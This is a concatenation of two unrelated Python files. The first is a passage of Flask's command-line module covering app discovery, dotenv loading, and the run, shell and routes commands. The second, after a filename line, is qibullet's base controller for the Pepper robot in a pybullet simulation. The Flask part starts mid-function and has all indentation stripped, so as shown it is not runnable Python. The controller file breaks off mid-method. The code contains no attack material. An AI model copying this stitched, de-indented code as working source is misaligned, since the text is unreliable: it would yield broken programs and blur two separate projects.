"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ('app', 'application'):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [
v for v in itervalues(module.__dict__) if isinstance(v, Flask)
]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
'one.'.format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ('create_app', 'make_app'):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
'could not call it without arguments. Use '
'"FLASK_APP=\'{module}:{factory}(args)\'" to specify '
'arguments.'.format(
factory=attr_name, module=module.__name__
)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(
module=module.__name__
)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if 'script_info' in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r'^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$', app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
'expression.'.format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval('({args},)'.format(args=args))
except (ValueError, SyntaxError)as e:
raise NoAppException(
'Could not parse the arguments in '
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
'be called with the specified arguments.'.format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
'A valid Flask application was not obtained from '
'"{module}:{app_name}".'.format(
module=module.__name__, app_name=app_name
)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
if os.path.splitext(path)[1] == '.py':
path = os.path.splitext(path)[0]
if os.path.basename(path) == '__init__':
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, '__init__.py')):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return '.'.join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
'\n\n{tb}'.format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException(
'Could not import "{name}".'.format(name=module_name)
)
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = 'Flask %(version)s\nPython %(python_version)s'
click.echo(message % {
'version': __version__,
'python_version': sys.version,
}, color=ctx.color)
ctx.exit()
version_option = click.Option(
['--version'],
help='Show the flask version',
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None,
set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get('FLASK_APP')
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (self.app_import_path.split(':', 1) + [None])[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ('wsgi.py', 'app.py'):
import_name = prepare_import(path)
app = locate_app(self, import_name, None,
raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
'Could not locate a Flask application. You did not provide '
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands wil be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(self, add_default_commands=True, create_app=None,
add_version_option=True, load_dotenv=True,
set_debug_flag=True, **extra):
params = list(extra.pop('params', None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points('flask.commands'):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ['FLASK_RUN_FROM_CLI'] = 'true'
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app,
set_debug_flag=self.set_debug_flag)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path):].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile('.env') or os.path.isfile('.flaskenv'):
click.secho(
' * Tip: There are .env or .flaskenv files present.'
' Do "pip install python-dotenv" to use them.',
fg='yellow')
return
if path is not None:
return dotenv.load_dotenv(path)
new_dir = None
for name in ('.env', '.flaskenv'):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += ' (lazy loading)'
click.echo(message)
click.echo(' * Environment: {0}'.format(env))
if env == 'production':
click.secho(
' WARNING: Do not use the development server in a production'
' environment.', fg='red')
click.secho(' Use a production WSGI server instead.', dim=True)
if debug is not None:
click.echo(' * Debug mode: {0}'.format('on' if debug else 'off'))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = 'path'
def __init__(self):
self.path_type = click.Path(
exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == 'adhoc':
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
'Using ad-hoc certificates requires pyOpenSSL.',
ctx, param)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7, 9):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get('cert')
is_adhoc = cert == 'adhoc'
if sys.version_info < (2, 7, 9):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.',
ctx, param)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.',
ctx, param)
if not cert:
raise click.BadParameter(
'"--cert" must also be specified.',
ctx, param)
ctx.params['cert'] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter(
'Required when using "--cert".',
ctx, param)
return value
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--cert', type=CertParamType(),
help='Specify a certificate file to use HTTPS.')
@click.option('--key',
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key, expose_value=False,
help='The key file to use when specifying a certificate.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=True,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads, cert):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(host, port, app, use_reloader=reload, use_debugger=debugger,
threaded=with_threads, ssl_context=cert)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s [%s]\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command('routes', short_help='Show the routes for the app.')
@click.option(
'--sort', '-s',
type=click.Choice(('endpoint', 'methods', 'rule', 'match')),
default='endpoint',
help=(
'Method to sort routes by. "match" is the order that Flask will match '
'routes when dispatching a request.'
)
)
@click.option(
'--all-methods',
is_flag=True,
help="Show HEAD and OPTIONS methods."
)
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo('No routes were registered.')
return
ignored_methods = set(() if all_methods else ('HEAD', 'OPTIONS'))
if sort in ('endpoint', 'rule'):
rules = sorted(rules, key=attrgetter(sort))
elif sort == 'methods':
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [
', '.join(sorted(rule.methods - ignored_methods)) for rule in rules
]
headers = ('Endpoint', 'Methods', 'Rule')
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = '{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}'.format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*('-' * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd='export' if os.name == 'posix' else 'set',
prefix='$ ' if os.name == 'posix' else '> '
))
def main(as_module=False):
args = sys.argv[1:]
if as_module:
this_module = 'flask'
if sys.version_info < (2, 7):
this_module += '.cli'
name = 'python -m ' + this_module
# Python rewrites "python -m flask" to the path to the file in argv.
# Restore the original command so that the reloader works.
sys.argv = ['-m', this_module] + args
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
base_controller.py
|
#!/usr/bin/env python
# coding: utf-8
import time
import atexit
import weakref
import pybullet
import threading
from qibullet.tools import *
from qibullet.controller import Controller
class BaseController(Controller):
"""
Class describing a robot base controller
"""
# _instances = set()
FRAME_WORLD = 1
FRAME_ROBOT = 2
def __init__(self, robot_model, physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
physicsClientId - The id of the simulated instance in which the
robot will be controlled
"""
Controller.__init__(self, robot_model, physicsClientId)
self.linear_velocity = 0
self.angular_velocity = 0
self.linear_acceleration = 0
self.angular_acceleration = 0
self.frame = BaseController.FRAME_ROBOT
self.pose_init = {}
self.pose_goal = {}
def _setGoal(self, x, y, theta, frame):
"""
INTERNAL METHOD, set the position of the goal to a specific frame.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
"""
self.goal = [x, y, theta]
self.frame = frame
def _updateGoal(self):
"""
INTERNAL METHOD, update the position of the goal.
"""
# get actual position in frame world
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
x, y, theta = self.goal
# pose x, y, z
pose_requested = [x, y, 0]
# orientation requested (euler)
orn_requested = [0, 0, theta]
# if we are in frame robot express the position in the frame world
if self.frame == BaseController.FRAME_ROBOT:
orn_euler = pybullet.getEulerFromQuaternion(actual_orn)
pose_requested = [
pose_requested[0] * math.cos(orn_euler[2])
- pose_requested[1] * math.sin(orn_euler[2])
+ actual_pos[0],
pose_requested[0] * math.sin(orn_euler[2])
+ pose_requested[1] * math.cos(orn_euler[2])
+ actual_pos[1],
0]
orn_requested = [
orn_euler[0],
orn_euler[1],
orn_euler[2] + theta]
self.pose_goal["position"] = pose_requested
self.pose_goal["orientation"] = orn_requested
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
self.linear_velocity = linear_velocity
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
self.angular_velocity = angular_velocity
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
self.linear_acceleration = linear_acceleration
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
self.angular_acceleration = angular_acceleration
class PepperBaseController(BaseController):
"""
Class describing a Pepper base controller
"""
MAX_LINEAR_VELOCITY = 0.55
MIN_LINEAR_VELOCITY = 0.1
MAX_ANGULAR_VELOCITY = 2.0
MIN_ANGULAR_VELOCITY = 0.3
MAX_LINEAR_ACCELERATION = 0.55
MIN_LINEAR_ACCELERATION = 0.1
MAX_ANGULAR_ACCELERATION = 3.0
MIN_ANGULAR_ACCELERATION = 0.1
def __init__(
self,
robot_model,
speed,
acceleration,
motion_constraint,
physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
speed - list containing the linear velocity and the angular
velocity values, in m/s
acceleration - list containing the linear acceleration and angular
acceleration values, in m/s^2
motion_constraint - the pybullet motion constraint applied on the
robot
physicsClientId - The id of the simulated instance in which Pepper
will be controlled
"""
BaseController.__init__(
self,
robot_model,
physicsClientId=physicsClientId)
# Set the different speeds and accelerations
self.setLinearVelocity(speed[0])
self._setAngularVelocity(speed[1])
self._setLinearAcceleration(acceleration[0])
self._setAngularAcceleration(acceleration[1])
# force applied in the movement
self.force = 100
# The robot will stop the movement with a precisio of 0.01 m and 0.02
# rads
self.linear_threshold = 0.01
self.angular_threshold = 0.02
self.motion_constraint = motion_constraint
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
if linear_velocity > PepperBaseController.MAX_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MAX_LINEAR_VELOCITY
elif linear_velocity < PepperBaseController.MIN_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MIN_LINEAR_VELOCITY
BaseController.setLinearVelocity(self, linear_velocity)
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
if angular_velocity > PepperBaseController.MAX_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MAX_ANGULAR_VELOCITY
elif angular_velocity < PepperBaseController.MIN_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MIN_ANGULAR_VELOCITY
BaseController._setAngularVelocity(self, angular_velocity)
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
if linear_acceleration > PepperBaseController.MAX_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MAX_LINEAR_ACCELERATION
elif linear_acceleration <\
PepperBaseController.MIN_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MIN_LINEAR_ACCELERATION
BaseController._setLinearAcceleration(self, linear_acceleration)
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
if angular_acceleration >\
PepperBaseController.MAX_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MAX_ANGULAR_ACCELERATION
elif angular_acceleration <\
PepperBaseController.MIN_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MIN_ANGULAR_ACCELERATION
BaseController._setAngularAcceleration(self, angular_acceleration)
def moveTo(self, x, y, theta, frame, _async=False):
"""
Move the robot in frame world or robot (FRAME_WORLD=1, FRAME_ROBOT=2).
This method can be called synchonously or asynchronously. In the
asynchronous mode, the function can be called when it's already
launched, this will update the goal of the motion.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
_async - The method is launched in async mode if True, in synch
mode if False (False by default)
"""
self._setGoal(x, y, theta, frame)
if self.module_process.isAlive():
if _async is False:
raise pybullet.error(
"Already a moveTo asynchronous. Can't "
"launch moveTo synchronous")
self._initProcess()
elif _async:
self.module_process = threading.Thread(target=self._moveToProcess)
self.module_process.start()
else:
self._moveToProcess()
def move(self, x, y, theta):
"""
Apply a speed on the robot's base.
Parameters:
x - Speed on the x axis, in m/s
y - Speed on the y axis, in m/s
theta - Rotational speed around the z axis, in rad/s
"""
# Kill any previous moveTo process running
self.moveTo(0, 0, 0, frame=BaseController.FRAME_ROBOT, _async=True)
# Bound the velocity. The max acceleration is not taken into account
# here, this is a potential improvment
if abs(x) > PepperBaseController.MAX_LINEAR_VELOCITY:
x = PepperBaseController.MAX_LINEAR_VELOCITY * (x/abs(x))
if abs(y) > PepperBaseController.MAX_LINEAR_VELOCITY:
y = PepperBaseController.MAX_LINEAR_VELOCITY * (y/abs(y))
if abs(theta) > PepperBaseController.MAX_ANGULAR_VELOCITY:
theta = PepperBaseController.MAX_ANGULAR_VELOCITY *\
(theta/abs(theta))
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_world_velocity = [
x * math.cos(actual_orn[2]) - y * math.sin(actual_orn[2]),
x * math.sin(actual_orn[2]) + y * math.cos(actual_orn[2]),
0]
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
linear_world_velocity,
[0, 0, theta],
physicsClientId=self.physics_client)
def stopMove(self):
"""
If an aynchronous moveTo has been launched, calling this method will
stop the asynchronous process. Calling this method is equivalent to
calling moveTo(0.0, 0.0, 0.0, BaseController.FRAME_ROBOT, _async=True)
"""
self.moveTo(0.0, 0.0, 0.0, BaseController.FRAME_ROBOT, _async=True)
def _updateConstraint(self):
"""
INTERNAL METHOD, update the robot's constraint.
"""
# Change the constraint to the requested position and orientation
pybullet.changeConstraint(
self.motion_constraint,
self.pose_goal["position"],
jointChildFrameOrientation=pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"]),
maxForce=self.force,
physicsClientId=self.physics_client)
def _initProcess(self):
"""
INTERNAL METHOD, initialize the motion process and all variables
needed.
"""
# Get actual position in frame world
self.pose_init["position"], self.pose_init["orientation"] =\
pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert pose_init orientation in orn_euler
self.pose_init["orientation"] = pybullet.getEulerFromQuaternion(
self.pose_init["orientation"]
)
self._updateGoal()
self._updateConstraint()
# Compute the ratio distance requested on the total distance
distance = getDistance(
self.pose_init["position"],
self.pose_goal["position"])
self.p_x = 0
self.p_y = 0
self.p_theta = 0
if distance:
self.p_x = (
self.pose_goal["position"][0] -
self.pose_init["position"][0]) / distance
self.p_y = (
self.pose_goal["position"][1] -
self.pose_init["position"][1]) / distance
theta_to_do = getOrientation(
self.pose_init["orientation"],
self.pose_goal["orientation"])
if abs(theta_to_do):
self.p_theta = abs(theta_to_do) / theta_to_do
def _endProcess(self):
"""
INTERNAL METHOD, stop the robot movement.
"""
# Change the constraint to the actual position and orientation in
# order to stop the robot's motion. The force applied is purposely huge
# to avoid oscillations.
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
pybullet.changeConstraint(
self.motion_constraint,
actual_pos,
jointChildFrameOrientation=actual_orn,
maxForce=self.force * 10,
physicsClientId=self.physics_client)
pybullet.resetBaseVelocity(
self.robot_model,
[0, 0, 0],
[0, 0, 0],
physicsClientId=self.physics_client)
def _moveToProcess(self):
"""
INTERNAL METHOD, process allowing to move the robot's base.
"""
self._initProcess()
# actual_pos = self.pose_init["position"]
# actual_orn = self.pose_init["orientation"]
init_pos = self.pose_init["position"]
init_orn = self.pose_init["orientation"]
actual_pos = init_pos
actual_orn = init_orn
while not self._module_termination:
translation_distance = getDistance(
actual_pos,
self.pose_goal["position"])
# Modulo the orientation pose goal with conversion in quaternion
modulo_quater_pose_goal = pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"])
# Conversion into euler
modulo_euler_pose_goal = pybullet.getEulerFromQuaternion(
modulo_quater_pose_goal)
rotation_distance = abs(getOrientation(
actual_orn,
modulo_euler_pose_goal))
if translation_distance < self.linear_threshold and\
rotation_distance < self.angular_threshold:
break
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_vel_x = computeVelocity(
self.linear_acceleration,
0.05,
self.linear_velocity,
getDistance(actual_pos, init_pos),
getDistance(actual_pos, self.pose_goal["position"]))
linear_vel_y = linear_vel_x
angular_vel = computeVelocity(
self.angular_acceleration,
0.05,
self.angular_velocity,
abs(getOrientation(
init_orn,
actual_orn)),
abs(getOrientation(
actual_orn,
self.pose_goal["orientation"])))
# If the robot is on the requested position, we set the velocity to
# 0.
